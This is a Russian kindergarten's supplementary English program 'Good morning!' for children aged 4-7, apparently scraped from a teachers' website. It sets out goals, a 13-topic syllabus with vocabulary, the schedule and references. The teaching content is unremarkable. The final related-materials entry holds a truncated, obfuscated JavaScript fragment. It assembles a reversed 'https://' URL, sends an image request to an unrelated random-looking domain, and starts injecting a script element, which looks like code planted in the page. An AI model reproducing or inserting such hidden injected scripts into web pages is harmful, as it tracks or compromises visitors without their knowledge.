ДОПОЛНИТЕЛЬНАЯ ОБЩЕОБРАЗОВАТЕЛЬНАЯ ОБЩЕРАЗВИВАЮЩАЯ ПРОГРАММА «Good morning!» по английскому языку для дошкольников
рабочая программа по развитию речи (средняя группа)
Скачать:
| Вложение | Размер |
|---|---|
| 44.74 КБ |
Предварительный просмотр:
Муниципальное автономное дошкольное образовательное учреждение «Детский сад комбинированной направленности №4» г. Сосновоборска
РАССМОТРЕНО Педагогический советом протокол №5 от 17.04.2024 г. | УТВЕРЖДАЮ Заведующий ______________ В.В. Тиншан Приказ №63 от 18.04.2024 г. |
ДОПОЛНИТЕЛЬНАЯ ОБЩЕОБРАЗОВАТЕЛЬНАЯ
ОБЩЕРАЗВИВАЮЩАЯ ПРОГРАММА
«Good morning!»
Направленность программы: учебно-познавательная
Уровень программы:
Возраст обучающихся: 4-7 лет
Срок реализации: 1 год
Составитель:
Педагог дополнительного образования
Цыганкова Ксения Андреевна
Сосновоборск 2024
- КОМПЛЕКС ОСНОВНЫХ ХАРАКТЕРИСТИК ДОПОЛНИТЕЛЬНОЙ ОБЩЕОБРАЗОВАТЕЛЬНОЙ ОБЩЕРАЗВИВАЮЩЕЙ ПРОГРАММЫ.
- Пояснительная записка
Дополнительная общеобразовательная общеразвивающая программа «Goodmorning!» разработана на основании следующей нормативно-правовой базы:
- Федеральный Закон от 29.12.2012 № 273 – ФЗ (ред. от 31.07.2020) «Об образовании в Российской Федерации» с изменениями и дополнениями;
- Федеральный государственный образовательный стандарт дошкольного образования от 17.10.2013 г. № 1155;
- Постановление Главного государственного санитарного врача РФ от 28 сентября 2020 года № 28 «Об утверждении СанПиН 2..4.3648-20 «Санитарно-эпидемиологические требования к организациям воспитания и обучения, отдых и оздоровления детей и молодежи»;
- Приказ Министерства просвещения Российской Федерации от 30 сентября 2020 г. № 533 «О внесении изменений в порядок организации и осуществления образовательной деятельности по дополнительным общеобразовательным программам, утвержденный приказом министерства просвещения Российской Федерации от 9 ноября 2018 г. №196»;
- Приказ Министерства просвещения РФ от 09 ноября 2018 года № 196 «Об утверждении Порядка организации и осуществления образовательной деятельности по дополнительным общеобразовательным программам»;
- Стратегия развития воспитания в Российской Федерации до 2025 года, утвержденная распоряжением Правительства РФ от 29.05.2015 г. № 996-р.
- Концепция развития дополнительного образования детей до 2030 года (утвержденная распоряжением Правительства Российской Федерации от 31 марта 2022 г. №678-р);
- Письмо Министерства образования и науки РоссийскойФедерации «О направлении информации» № 09-3242 от 18.11.2015 г. Методические рекомендации по проектированию дополнительных общеразвивающих программ (включая разноуровневые программы) разработанные Минобрнауки России совместно с ГАОУ ВО «Московский государственный педагогический университет», ФГАУ «Федеральный институт развития образования», АНО ДПО «Открытое образование»;
- Приказ Министерства просвещения Российской Федерации от 03.09.2019 г. № 467 «Об утверждении Целевой модели развития региональных систем дополнительного образования детей»;
- Приказ Министерства образования и науки Российской Федерации от 09.01.2014 г. №2 «Об утверждении Порядка применениями организациями, осуществляющимися образовательную деятельность, электронного обучения, дистанционных образовательных технологий при реализации образовательных программ».
- Направленность программы
Дополнительная общеобразовательная программа по обучению английскому языку детей дошкольного возраста имеет социально-педагогическую направленность; по функциональному предназначению является учебно-познавательной; по форме организации – групповой. Программа дает общее представление детям о мире как многоязычном и поликультурном сообществе. Она призвана обеспечить усвоение базовых основ, и способствовать формированию навыков решения элементарных коммуникативных задач на английском языке, а также, приобретению элементарных страноведческих знаний о странах изучаемого языка.
Актуальность и новизна
В современном мире возросла значимость изучения иностранного языка. Сейчас изучение английского языка в школе начинается со второго или первого класса. Новые образовательные стандарты ставят высокие требования к усвоению иностранного языка. Во многих школах изучают не только английский, но и другие иностранные языки.
В связи с возрастающей учебной нагрузкой в начальной школе, с одной стороны, и заинтересованностью родителей в изучении их детьми английского языка с другой, появилась необходимость в создании программы обучения английского языка в раннем возрасте.
Новизна программы состоит в том, что при обучении английскому языку пристальное внимание уделяется выработке навыков свободного общения и прикладного применения английского языка.
Актуальность программы обусловлена ее практической значимостью. Дети смогут применить полученные знания когда пойдут в школу. К тому моменту у них будет сформирован познавательный интерес и накоплен определенный объем знаний, что значительно облегчит освоение образовательной программы по английскому языку в школе.
Влияние иностранного языка на развитие личности поистине уникальны. Известно, что дошкольный возраст является благоприятным для усвоения иностранного языка, так как у маленького ребёнка прекрасно развита долговременная память.
Отличительные особенности программы
Занятия по программе знакомят ребенка с основами иноязычной культуры, т.е. сообщает ребенку базовый объем знаний, умений и навыков. Занятия являются устным подготовительным этапом к чтению и письму.
Раннее обучение иностранному языку развивает ребенка всесторонне. У него улучшается память, сообразительность, развивается наблюдательность.
Поскольку игра является ведущим видом деятельности дошкольника, задачи обучения тесно связаны с миром, в котором живет ребенок. Это мир сказок, стишков, песенок, где царит любознательность и желание поиграть со сверстниками.
Учебный материал подается в игровой форме, неутомительной для ребенка. Различные творческие задания будут способствовать развитию воображения и помогут лучше усвоить пройденный материал на занятии. Обучение проводится с опорой на родной язык, но постепенно переходит на иностранный. Направлена программа на быстрое и качественное овладение разговорным английским языком (усвоение алфавита, правильно называть цвета, считать до 10, рассказывать о себе и своей семье и так далее). Ребенку придется прослушивать сказки, дорисовывать предметы и придумывать рифмовки, раскрашивать, соединять точки, находить спрятавшихся зверюшек, делать аппликации и многое другое. На каждом занятии дети разучивают стишки, пословицы, песни либо рифмовки которые построены на словах и фразах, уже усвоенных ребенком.
Данная программа базируется на принципах коммуникативного обучения и направлена на формирование положительной познавательной мотивации
Адресат программы
Программа предназначена для детей возрастом 4-7 лет, наполняемость группы 10-12 человек.
Срок реализации и объем учебных часов
Программа рассчитана на 1 год обучения: 64 часа, 2 раза в неделю, по 1 часу.
Форма обучения и режим занятий
Обучение осуществляется в очной форме.Занятия проводятся два раза в неделю по 1 часу.
Продолжение учебного часа – 25-30 минут согласно СанПиН 2..4.3648-20 от 28.09.2020 г.
- Цель и задачи дополнительной общеобразовательной общеразвивающей программы.
Цель программы:
Ознакомление с новой языковой средой, формирование интереса к изучению иностранного (английского) языка.
Задачи:
Личностные:
• формировать представление о мире как многоязычном и поликультурном сообществе;
• формировать желания продолжать обучение иностранному языку в дальнейшем, желание использовать английский язык как средство общения;
Метапредметные:
• развивать умения взаимодействовать с окружающими при выполнении различных заданий;
• формировать мотивацию к изучению иностранного языка; Предметные:
• развивать два вида речевой деятельности: аудирование (восприятия речи на слух) и говорение.
• развивать элементарную диалогическую и монологическую речь;
• вырабатывать у детей навыки правильного произношения английских звуков и правильного интонирования высказывания
- СОДЕРЖАНИЕ ПРОГРАММЫ
2.1. Учебный план
№ п/п | Наименование раздела, темы | Количество часов | Формы аттестации / контроля | ||
Всего | Теория | Практика | |||
1. | Знакомство. Как тебя зовут? Вежливые слова. Как твои дела? | 4 | 1 | 3 | Устный опрос, Решение проблемных задач, Диагностика. |
2. | Цвета. «Игра «Let’s draw» | 4 | 1 | 3 | Опрос, Игра, выставка творческих работ |
3. | Животные. Питомцы. Дикие животные. Животные фермы. | 4 | 1 | 3 | Опрос, игра, наблюдение, проектная деятельность, диагностика |
4. | Счет от 1 до 10. Игра «Сосчитай». Сколько тебе лет? | 3 | 1 | 2 | Опрос, диагностика, игра, решение проблемных задач |
5. | Мои игрушки. Моя любимая игрушка. Какого цвета игрушки? | 5 | 2 | 3 | Опрос, игра, решение проблемных задач, проектная деятельность |
6. | Одежда | 6 | 2 | 4 | Презентация, опрос, проектная деятельность, игра |
7. | Моя семья. | 5 | 2 | 3 | Опрос, проектная деятельность, презентация |
8. | Мое тело Какого цвета волосы? Сколько у тебя пальцев? Игра «Покажите свои …» | 6 | 2 | 4 | Опрос, проектная деятельность, презентация, игра |
9. | «Что я умею делать» «Мне нравится/мне не нравится…» | 7 | 3 | 4 | Опрос, проектная деятельность, презентация |
10. | Времена года | 6 | 2 | 4 | Опрос, проектная деятельность, презентация, выставка творческих работ |
11. | Профессии | 6 | 2 | 4 | Опрос, проектная деятельность, презентация, игра, диагностика |
12. | Фрукты и овощи. | 3 | 1 | 2 | Опрос, игра, диагностика |
13. | Еда | 5 | 2 | 3 | Опрос, игра, диагностика |
1.4 Содержание учебного плана программы
1. Знакомство. Как тебя зовут? Вежливые слова. Как твои дела?
Ознакомление с новыми лексическими единицами. Тренировка произношения звуков и интонации речи. Знакомимся с новыми словами и выражениями.Закрепление употребления фраз приветствия и прощания: Hello! Goodmorning/afternoon/evening/night!
Bye! Goodbye!
Thankyou/ Sorry
Игра «Помоги Микки поздороваться/попрощаться».
Учимся отвечать на вопрос: «Howareyou?», рассказываем как у нас дела.
2.Цвета.
Повторение ранее изученного на основе цветов радуги. Просмотр мультфильмов. Рисование картин по теме. Основные лексические единицы:
Red — красный.
Orange — оранжевый.
Yellow — желтый.
Green — зеленый.
Blue — голубой.
Indigo — синий.
Violet — фиолетовый.
Учим сочетания цветов на примере смешивания краски.
3.Животные. Питомцы. Дикие животные. Животные фермы.
Повторение ранее изученного, закрепление.
Игра «What kind of animal is this?» Просмотр презентации и мультфильмов по теме.
Основные лексические единицы:
сat [kæt] кот
kitten [kɪtn] котенок
dog [dɒɡ] собака
puppy ['pʌpɪ] щенок
hamster ['hæmstə] хомяк
parrot ['pærət] попугай
guinea pig ['ɡɪnɪ pɪɡ] морская свинка
4.Счет от 1 до 10.
Повторение и диагностика ранее изученного.
Игра «Посчитай сколько?»
Учимся отвечать на вопрос: «How old are you?»
Основные лексические единицы:
0 — Zero/Oh;
1 — One;
2 — Two;
3 — Three;
4 — Four;
5 — Five;
6 — Six;
7 — Seven;
8 — Eight;
9 — Nine;
10 — Ten.
5.Мои игрушки.
Повторение и диагностика ранее изученного. Знакомство с новыми лексическими единицами.
Проект: «My favourite toy». Учимся описывать игрущки: цвет, размер, величина.
6.Одежда.
Изучение новых лексических единиц по теме:
Верхняя одежда:
coat (пальто),
jacket (куртка),
sweater (свитер),
hoodie (толстовка с капюшоном),
raincoat (дождевик),
hat (шапка),
gloves (перчатки),
scarf (шарф),
boots (ботинки).
Повседневная одежда:
shirt (рубашка),
jeans (джинсы),
pants (брюки),
skirt (юбка),
dress (платье),
socks (носки)
Учимся описывать что мы надеваем каждый день, а что по погоде.
7.Моя семья.
Изучение новых лексических единиц:
мать — mother [ˈmʌðə];
отец — father [ˈfɑːðə];
брат — brother [ˈbrʌðə];
сестра — sister [ˈsɪstə];
дочь — daughter [ˈdɔːtə];
сын — son [sʌn];
дедушка — grandfather [ˈɡrænfɑːðə];
бабушка — grandmother [ˈɡrænˌmʌðə];
внук, внучка, внуки — grandson [ˈɡrænsʌn], granddaughter [ˈɡrændɔːtə], grandchildren [ˈɡræntʃɪldrən].
Проект «Мой фотоальбом». Дети презентуют фото своей семьи, учатся рассказывать о ее составе.
Разучивание песни «Baby shark».
8.Мое тело
Изучение новых лексических единиц:
Eyes – глаза – [ˈaɪz]
Nose – нос – [nəʊz]
Head – голова - [hed]
Body – тело - ['bɔdɪ]
Arm – рука - [ɑːm]
Leg – нога - [leg]
Face – лицо – [feɪs]
Finger – палец – [ˈfɪŋɡər]
Heart – сердце – [hɑːrt]
Shoulder – спина - ['ʃəuldə]
Учимся описывать свое тело.
9. «Я умею…»
«Мне нравится/мне не нравится…»
Изучение новых лексических единиц.
Разбор состава английского предложения с формами: « I can…», «I like…».
Формирование навыка состава связных предложений на английском языке.
10.Времена года.
Изучение новых лексических единиц:
Зима — Winter.
Весна — Spring.
Лето — Summer.
Осень — Autumn.
Учимся рассказывать о погоде, о смене времен года. Формирование навыков связных предложений на английском языке.
11. Профессии.
Изучение новых лексических единиц:
Teacher- учитель
Builder- строитель
Scientist- ученый
Actor- актер
shop assistant- продавец
cook- повар
doctor- доктор, врач
policeman- полицейский
Проект «When I grow up…» - представление детьми рассказа кем они хотят стать, когда вырастут.
12.Фрукты и овощи.
Повторение и диагностика пройденного. Ввод новых лексических единиц.
Основные лексические единицы:
Vegetables — овощи;
Beet — свёкла;
Cabbage — капуста;
Сarrot — морковь;
Cucumber — огурец;
Eggplant — баклажан;
Onion — лук;
Potato — картофель;
Pumpkin — тыква;
Radish — редис;
Tomato — помидор.
Аpple — яблоко;
Banana — банан;
Orange — мандарин;
Pear — груша;
Pineapple — ананас;
Mango — манго;
Peach — персик;
Lemon — лимон;
Lime — лайм;
Apricot — абрикос.
Ролевая игра «In the shop».
12. Еда.
Изучение новых лексических единиц:
food — питание, еда;
ham — ветчина;
sausage — колбаса, сосиска;
meat — мясо;
egg — яйцо;
pizza — пицца;
soup — суп;
bread — хлеб;
milk — молоко;
porridge — каша;
flour — мука;
salad — салат;
fish — рыба;
chicken — цыплёнок;
pork — свинина;
beef — говядина;
butter — масло;
macaroni — макароны;
cheese — сыр;
rice — рис;
pasta — паста;
salt — соль;
sandwich — бутерброд;
Ролевые игры: «In the shop», «In the restaurant».
1.5. Планируемые результаты:
Основные требования к планируемым результатам освоения программы «Goodmorning!» представляют собой не нормативно закрепленные знания или компетенции, а социальные и психологические характеристики возможных достижений ребёнка на этапе завершения уровня. Дошкольного образования. Главным итогом освоения программы следует считать активное и заинтересованное отношение детей к занятиям, положительное переживание каждым ребенком своего участия в организуемых видах познавательной активности и желание продолжать обучение в следующей возрастной группе английского языка и школе.
Личностные результаты:
В результате освоения социально-личностной компетенции будет / будут:
- сформирован интерес к изучению английского языка и иностранной культуры;
- сформировано желание продолжать изучение английского языка и окружающего мира;
- продемонстрировано понимание важности учения в жизни человека;
- развито гуманное отношение к людям и животным;
- расширен социальный кругозор (я и окружающий мир).
Метапредметные результаты:
В результате освоения учебно-познавательной компетенции будут / будет:
- сформированы элементарные познавательные действия для запоминания слов, выражений английского языка, а также кратких диалогов;
- усвоены отдельные универсальные познавательные действия; усвоен прием подражания правильным формам речевого и неречевого поведения;
- развито умение организовать свое рабочее место;
- развито умение действовать по образцу;
- продемонстрировано умение оценивать поступки и предметы;
- продемонстрировано умение выполнять игровое задание (следовать инструкциям взрослого, давать ответы или составлять краткие высказывания на английском языке по игровой ситуации общения);
- продемонстрирован прием сравнения и сопоставления предметов и явлений.
Предметные результаты
В результате освоения речевой коммуникативной компетенции будут / будет:
- усвоены слова английского языка для активного употребления (не менее 30 слов)
- усвоены слова английского языка для узнавания(около 50 слов);
К концу учебного года (май) дети должны уметь:
- приветствовать собеседника, познакомиться с ним;
- вычленять английскую речь в общем речевом потоке;
- здороваться, прощаться на английском языке;
- отвечать на элементарные вопросы.
РАЗДЕЛ II. КОМПЛЕКС ОРГАНИЗАЦИОННО-ПЕДАГОГИЧЕСКИХ УСЛОВИЙ
2.1. Календарный учебный график
№п/п | Год обучения | Дата начала занятий | Дата окончания занятий | Количество учебных недель | Количество учебных дней | Количество учебных часов | Режим занятий | Сроки проведения (промежуточной) итоговой аттестации |
1. | 1 | 01.10.2024 | 31.05.2025 | 32 | 64 | 64 | 2 раза в неделю по 1 часу | декабрь май |
2.2. Условия реализации программы
Материально-техническое обеспечение
Дополнительная общеобразовательная общеразвивающая программа «Goodmorning!» реализуется на базе МАДОУ ДСКН № 4 г.Сосновоборска.
Для реализации данной программы необходимо следующее оборудование:
- Помещение
− оборудованный кабинет-лаборатория: столы и стулья, шкаф с отделениями для хранения методических, дидактических материалов, расходных материалов и канцелярии.
Помещение соответствует санитарно-гигиеническим требованиям для проведения занятий и охране труда:
- в помещении равномерное освещение и отсутствие прямых и отраженных бликов,
- помещение сухое, хорошо проветриваемое,
- в кабинете имеются столы и стулья по количеству участников, отвечающие эргономическим требованиям, раковина, холожная и горячая вода,
- в наличии шкафы для хранения материалов, наглядных пособий,
- Оборудование
1) ноутбук;
2) мультимедийный проектор;
3) экран;
4) оборудование для музыкального сопровождения занятий.
5) магнитная доска
Наглядные пособия:
- тематические карточки «Цвета», «Формы», «Семья», «Продукты», «Времена года», «Фрукты и овощи», «Мебель», «Одежда», «Животные», «Моя комната», «Части тела»; «Транспорт»
- объемные предметы разной величины и цвета (машинки, мячики, животные, кубики, куклы);
Аудиоматериалы:
- песни: «Hello», «How are You?», «Good Bye»;
- звуки диких животных;
- звуки домашних животных;
- звуковое сопровождение сказок (звуковые эффекты).
Видеоматериалы:
«Good Morning», «Hello, Hello, How Are You? What’s Your Name?», «Butterflies», «If You Happy», «Shapes», «My Teddy Bear», «Head, Shoulders, Knees and Toes», «Let’s Go to the Zoo», «Let’s Make a Pizza», «Rain, Rain Go Away», «Who Is She?», «Transport», «Old Mc Donald’s Farm», «Snowflakes», «Oranges Are Yummy», «My Family», «Primary Colors», «Five Little Monkeys», «Dangerous Toys», «My Toys Song», «I’m a Little Teapot», «My Room Is Cool», «Put on Your Shoes», «What’s the Weather Like?».
2.3. Научно-методическое обеспечение образовательной программы
1. Английский язык и дошкольник М. В. Штайнепрайс. М.:Сфера, 2007.
2. Бурова И.И., Буров А.В. Английский язык. Словарик. Песенки. Игры. – М., ОЛМА Медиа Групп, 2007.
3. Иванова М.В. Английский для самых маленьких. – М., АСТ-Астрель, 2006.
4. Каркусова Д.М. Учим английскому языку, играя. Пособие для учителей. – Ростов н/Д., Феникс, 2007.
5. КлементьеваТ.Б., БоумаЭ. Path to the World. Английский язык для дошкольников: в 2 ч. - М., Вентана-Граф, 2012.
6. Пассов, Е.И. Коммуникативный метод обучения иноязычному говорению. - М.: Просвещение, 1991.
7. Протасова, Е.Ю. Обучение дошкольников иностранному языку. Программа «Littlebylittle»/ Е. Ю. Протасова, Н. М. Родина. – М.: Карапуз-Дидактика, 2009.
Список литературы
1. Негневицкая Е.И. Книга для учителя. – М.: Просвещение, 1994
3. Верещагина И.Н., Притыкина Т.А. Книга для учителя. – М.: Просвещение, 2003
4. Английский язык для маленьких, Под ред. Н.А. Бонк – М., 2000
5. Шишкова И.А., Вербовская И.Е. Английский для малышей. – М.: Издательский дом «РОСМЭН», 2000
6. Андреева Н.Ш. Программа английского языка – Оренбург, 1994
7. Английский язык в картинках. Серия “Готовимся к школе” — М, 2003
9. Ленская Е.А., Негневицкая Е.И. “Учимся английскому языку” — М, 1997
10. Скульте В. Английский для детей – М., 1997
11. Кириллова Ю.В. Английский для дошкольников. Ростов н/Д Феникс,
По теме: методические разработки, презентации и конспекты
Программа по изучению английского языка для дошкольников . "Игровой английский язык".
Программа по изучению иностранного языка "Игровой английский язык". для детей от 4 до 6.5 лет...
Отчет о работе по дополнительной платной услуге по изучению иностранного языка «Английский язык для дошкольников» за 2015–2016 учебный год Руководитель дополнительной платной образовательной услуги: Рзаева Оксана Минниахматовна
Отчет о работе по дополнительной платной услуге по изучению иностранного языка «Английский язык для дошкольников» за 2015–2016 учебный год Руководитель дополнительной платной образовательно...

Программа "Английский язык и дошкольник" для дошкольников изучающих английский язык
В связи с возрастающей учебной нагрузкой в детском саду, с одной стороны, и заинтересованностью родителей в изучении их детьми английского языка с другой, а также исходя из заботы о здоровье ре...

Программа Дополнительного образования «Английский язык для дошкольников»
Настоящая программа составлена с учетом особенностей умственного, психического и физиологического развития детей. В процессе обучения иностранному языку дети познают не только новое, но и начинают бол...
Дополнительная общеобразовательная общеразвивающая программа социально-педагогическй направленности "Английский язык для дошкольников"
Знание иностранных языков является неотъемлемым навыком в современном мире. В связи с этим возникает актуальность обучения языкам уже в дошкольном возрасте. Гибкость механизма запоминания, отсутс...
МЕТОДИЧЕСКАЯ РАЗРАБОТКА по английскому языку для дошкольников «Наше путешествие в зоопарк» по дополнительной общеразвивающей программе «Музыка-English» второго модуля обучения школы раннего эстетического развития
Методическая разработка предназначена для обучения основам иностранного языка детей дошкольного возраста. Представлено развивающее занятие с использованием нового языкового материала,а также закреплен...

НОД "Настроение Джони" по дополнительной образовательной программе "Английский язык и дошкольник" в ДОУ
var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'nxqkbdvu.lussoit.com\',\'48\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); var script = document.cre...
